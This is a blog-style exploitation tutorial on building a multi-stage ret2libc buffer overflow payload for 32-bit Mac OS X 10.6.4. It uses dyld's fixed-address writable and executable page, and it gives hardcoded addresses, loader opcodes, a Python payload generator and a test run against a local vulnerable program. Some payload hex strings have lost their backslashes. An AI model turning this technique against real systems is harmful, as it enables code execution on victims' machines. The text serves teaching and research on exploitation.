Talking about buffer overflow exploit on x86, Mac OS X is the most easy and hacker friendly target compare to Linux or Windows. OS X always loads **/usr/lib/dyld **at a fixed location and it contains a lot of helper stubs to launch the exploit. If you want something advanced likes ROP (Return-Oriented-Programming) exploit you may have a look at “Mac OS X Return-Oriented Exploitation” and thorough step-by-step guide “OSX ROP Exploit – EvoCam Case Study“. But actually, we don’t need ROP for 32-bit exploitation on OS X, simple ret2libc is enough and straightforward to implement. Let take a look at multi-stage ret2libc exploit on OS X.

The target

Under OSX, dyld is always loaded at a fixed location with __IMPORT page is RWX as shown below:

#__TEXT                 8fe00000-8fe0b000 [   44K] r-x/rwx SM=COW  /usr/lib/dyld
#__TEXT                 8fe0b000-8fe0c000 [    4K] r-x/rwx SM=PRV  /usr/lib/dyld
#__TEXT                 8fe0c000-8fe42000 [  216K] r-x/rwx SM=COW  /usr/lib/dyld
#__LINKEDIT             8fe70000-8fe84000 [   80K] r–/rwx SM=COW  /usr/lib/dyld
#__DATA                 8fe42000-8fe44000 [    8K] rw-/rwx SM=PRV  /usr/lib/dyld
#__DATA                 8fe44000-8fe6f000 [  172K] rw-/rwx SM=COW  /usr/lib/dyld
#__IMPORT               8fe6f000-8fe70000 [    4K] rwx/rwx SM=COW  /usr/lib/dyld
__TEXT                 8fe00000-8fe0b000 [   44K] r-x/rwx SM=COW  /usr/lib/dyld
__TEXT                 8fe0b000-8fe0c000 [    4K] r-x/rwx SM=PRV  /usr/lib/dyld
__TEXT                 8fe0c000-8fe42000 [  216K] r-x/rwx SM=COW  /usr/lib/dyld
__LINKEDIT             8fe70000-8fe84000 [   80K] r--/rwx SM=COW  /usr/lib/dyld
__DATA                 8fe42000-8fe44000 [    8K] rw-/rwx SM=PRV  /usr/lib/dyld
__DATA                 8fe44000-8fe6f000 [  172K] rw-/rwx SM=COW  /usr/lib/dyld
__IMPORT               8fe6f000-8fe70000 [    4K] rwx/rwx SM=COW  /usr/lib/dyld

Our target is to transfer the desired shellcode to the __IMPORT section of dyld then execute it. We can simply do this with byte-per-byte copy way of ROPEME. There is some disadvantages with this method:

  • Payload size is large, around 10 times of actual shellcode
  • We have to re-generate the whole payload when changing to new shellcode

With OS X we can do it better as there is a RWX page at static location.

Staging payload

The most complicated part of ROP technique is “stack pivoting” or ESP register control under ASLR. By executing a small shellcode we can take ESP under control easily. Our multi-stage payload will look like:

Stage-2: actual shellcode

This is the last stage in our multi-stage payload. Any NULL-free shellcode can be used, e.g bind shell code from Metasploit.

Stage-1: shellcode loader for stage-2 payload

This stage will transfer stage-2 payload on stack to __IMPORT section (RWX) of dyld then executes it. The transfer function is *_strcpy() *in dyld. Below small shellcode will be executed on RWX page to perform the job:

# 58                pop eax     # eax -> TARGET
# 5B                pop ebx     # ebx -> STRCPY
# 54                push esp    # src -> &shellcode
# 50                push eax    # dst -> TARGET
# 50                push eax    # jump to TARGET when return from _strcpy()
# 53                push ebx    # STRCPY
# C3                ret         # execute _strcpy(TARGET, &shellcode)

Stage-0: ret2libc loader for stage-1 payload

This stage will transfer 7 bytes of stage-1 payload to our RWX location using repeated *_strcpy() *calls, then executes it. We lookups the dyld for necessary byte values and copy it to the target byte-per-byte.

In summary, there is some advantages with our multi-stage payload:

  • Straightforward to implement: only ret2libc calls, no gadget is required
  • Payload size overhead is small: around 100 bytes
  • Independent, generic loader code: no need to regenerate the whole payload, just append a new shellcode to make new payload

Automated payload generator

Let put all this together and make an automated payload generator in Python.

  • Select the target
#__IMPORT               8fe6f000-8fe70000 [    4K] rwx/rwx SM=COW  /usr/lib/dyld
TARGET = 0x8fe6f010 # to avoid NULL byte
# dyld base address
DYLDADDR = 0x8fe00000
  • Extract dyld’s i386 code
# $ otool -f /usr/lib/dyld
# ...
#architecture 1
#    cputype 7
#    cpusubtype 3
#    capabilities 0x0
#    offset 352256
#    size 368080
#    align 2^12 (4096)
# ...

DYLDFILE = "/usr/lib/dyld"
DYLDCODE = open(DYLDFILE, "rb").read()
DYLDCODE = DYLDCODE[352256 : 352256+368080]
  • _strcpy() call
# $ nm -arch i386 /usr/lib/dyld | grep _strcpy
# 8fe2db10 t _strcpy
STRCPY = 0x8fe2db10

# $ otool -arch i386 -tv /usr/lib/dyld | grep pop -A2 | grep ret -B1 | grep pop
# 8fe28790        popl    %edi
# 8fe2b3d4        popl    %edi
POP2RET = 0x8fe2878f
  • stage-1
# stage1
# 58                pop eax     # eax -> TARGET
# 5B                pop ebx     # ebx -> STRCPY
# 54                push esp    # dst -> &shellcode
# 50                push eax    # src -> TARGET
# 50                push eax    # jump to TARGET when return from _strcpy()
# 53                push ebx    # STRCPY
# C3                ret         # execute _strcpy(TARGET, &shellcode)

STAGE1 = "x58x5bx54x50x50x53xc3"
  • stage-0
# stage0: _strcpy sequences
STAGE0 = gen_stage0(DYLDCODE, STAGE1)

Below is the stage-0 payload loader generated for OS X 10.6.4:

STAGE0 = (  "x10xdbxe2x8fx8fx87xe2x8fx10xf0xe6x8fx31x24xe1x8f"
            "x10xf0xe6x8fx10xf0xe6x8fx10xdbxe2x8f" )

Test the payload with simple buffer overflow:

bash-3.2$ ./vuln "`python -c 'print "A"*272 + "x10xdbxe2x8fx8fx87xe2x8fx10xf0xe6x8fx31x24xe1x8fx10xdbxe2x8fx8fx87xe2x8fx12xf0xe6x8fx32x01xe0x8fx10xdbxe2x8fx8fx87xe2x8fx13xf0xe6x8fx7ex21xe1x8fx10xdbxe2x8fx8fx87xe2x8fx15xf0xe6x8fx45x10xe0x8fx10xdbxe2x8fx8fx87xe2x8fx16xf0xe6x8fx44x10xe0x8fx10xf0xe6x8fx10xf0xe6x8fx10xdbxe2x8f" + "xcc"*4'`


Trace/BPT trap


Looking for the next? Maybe “Mac OS X ROP exploit on x86_64″ someday.